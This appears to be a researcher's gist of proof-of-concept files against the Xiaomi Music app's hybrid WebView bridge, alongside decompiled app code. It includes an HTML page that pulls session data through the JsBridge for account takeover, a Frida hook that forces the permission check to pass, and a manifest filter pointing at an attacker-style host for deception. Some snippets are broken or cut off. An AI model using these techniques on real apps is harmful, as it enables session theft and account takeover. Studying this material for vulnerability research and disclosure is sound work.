
View ato.html
<html>
<body>
<script src='remote-server/jsBridge-mix.js'> //host the jsBridge-mix.js from resources directory
JsBridge.invoke("get_session_data", {}, function(a) { //the a variable will contain the response JSON object from the Java code
var i = {};
i = a;
window.alert(JSON.stringify(i);
})
</script>
</body>
View frida.js
Java.perform(function() {
console.log("Starting hook");
var Activity = Java.use("com.xiaomi.music.hybrid.internal.PermissionManager");
Activity.isValid.implementation = function () {
return true;
};
Java.choose("com.xiaomi.music.hybrid.internal.Config", {
onMatch: function(inst) {
View config.java
private String config(Config config, boolean z) {
if (z) {
SecurityManager securityManager = new SecurityManager(config, this.mActivity.getApplicationContext());
if (securityManager.isExpired() || !securityManager.isValidSignature()) { // validation of the config object
return new Response(202).toString();
}
}
this.mFM = new FeatureManager(config, this.mActivity.getClassLoader());
this.mPM = new PermissionManager(config);
return new Response(0).toString();
View invoke.java
public String invoke(String str, String str2, String str3, String str4) {
if (!this.mPM.isValid(this.mPageContext.getUrl())) {
return new Response(203).toString();
}
Request request = new Request();
request.setAction(str2);
request.setRawParams(str3);
request.setPageContext(this.mPageContext);
request.setView(this.mView);
request.setNativeInterface(this.mNativeInterface);
View jsinterface.java
/**
 * Passes a config string supplied by page JavaScript to the hybrid manager and returns
 * the manager's response unchanged.
 *
 * <p>The method carries {@code @JavascriptInterface}, so script running in the WebView this
 * object is attached to can call it directly; treat {@code str} as untrusted input.
 * No validation happens in this method itself.
 * NOTE(review): any checking of the payload would have to live in {@code mManager.config} - confirm.
 *
 * @param str config payload handed over by the page
 * @return the response string produced by the manager
 */
@JavascriptInterface
public String config(String str) {
    final String response = this.mManager.config(str);
    // Level 3 is DEBUG if Log is android.util.Log; the full response is only traced when
    // the "hybrid" tag is loggable at that level.
    final boolean traceEnabled = Log.isLoggable("hybrid", 3);
    if (traceEnabled) {
        Log.d("hybrid", "config response is " + response);
    }
    return response;
}
@JavascriptInterface
View hybridmanager.java
private void initView() {
initSettings(this.mView.getSettings());
this.mView.setWebViewClient(new HybridViewClient(this));
HybridChromeClient hybridChromeClient = new HybridChromeClient();
hybridChromeClient.setHybridManager(this);
this.mView.setWebChromeClient(hybridChromeClient);
if (HybridView.DEBUG) {
WebView.setWebContentsDebuggingEnabled(true);
}
HybridView hybridView = this.mView;
View parsefragment.java
public static FragmentInfo parseFragment(Uri uri) {
if (uri == null || !FeatureConstants.SCHEME.equals(uri.getScheme())) {
return null;
}
IDeviceCompat deviceCompat = IApplicationHelper.CC.getInstance().getDeviceCompat();
Uri adapter = DisplayCompact.adapter(uri);
if (adapter == null) {
return null;
}
IAppInstance.CC.getInstance().OnlineServiceHelperCheckOnlineUriAndOpenSwitch(IApplicationHelper.CC.getInstance().getContext(), adapter);
View musicbrowseractivity.java
public boolean dispatch(Intent intent, boolean z) {
MusicLog.i(TAG, "dispatch uri: " + intent.getData());
if (PrivacyCheckHelper.isAgreeMusicPrivacy() || canIgnorePrivacy(intent) || PrivacyCheckHelper.isSkipMusicUserTerm()) {
MediaPlaybackServiceProxy mediaPlaybackServiceProxy = this.mPlaybackService;
if (mediaPlaybackServiceProxy == null) {
MusicLog.e(TAG, "mPlaybackService is NULL, skip this dispatch");
return false;
}
if (!mediaPlaybackServiceProxy.hasService()) {
this.mHandler.sendEmptyMessageDelayed(2, 1500);
View music-manifest.xml
<intent-filter>
<action android:name="android.intent.action.VIEW"/>
<category android:name="android.intent.category.DEFAULT"/>
<category android:name="android.intent.category.BROWSABLE"/>
<data android:scheme="miui-music" android:host="play"/>
<data android:scheme="miui-music" android:host="view"/>
<data android:scheme="miui-music" android:host="detail"/>
<data android:scheme="miui-music" android:host="home"/>
<data android:scheme="miui-music" android:host="search"/>
<data android:scheme="miui-music" android:host="artist"/>
View task-decep.xml
<!-- App Links filter: autoVerify="true" asks Android to verify that this app is associated
     with the https host declared below (Digital Asset Links). The filter matches only the
     exact path /deceive.html on that host and is reachable from a browser (BROWSABLE). -->
<intent-filter android:autoVerify="true">
<action android:name="android.intent.action.VIEW" />
<category android:name="android.intent.category.DEFAULT" />
<category android:name="android.intent.category.BROWSABLE" />
<data
android:path="/deceive.html"
android:host="recon.takemyhand.xyz"
android:scheme="https" />
</intent-filter>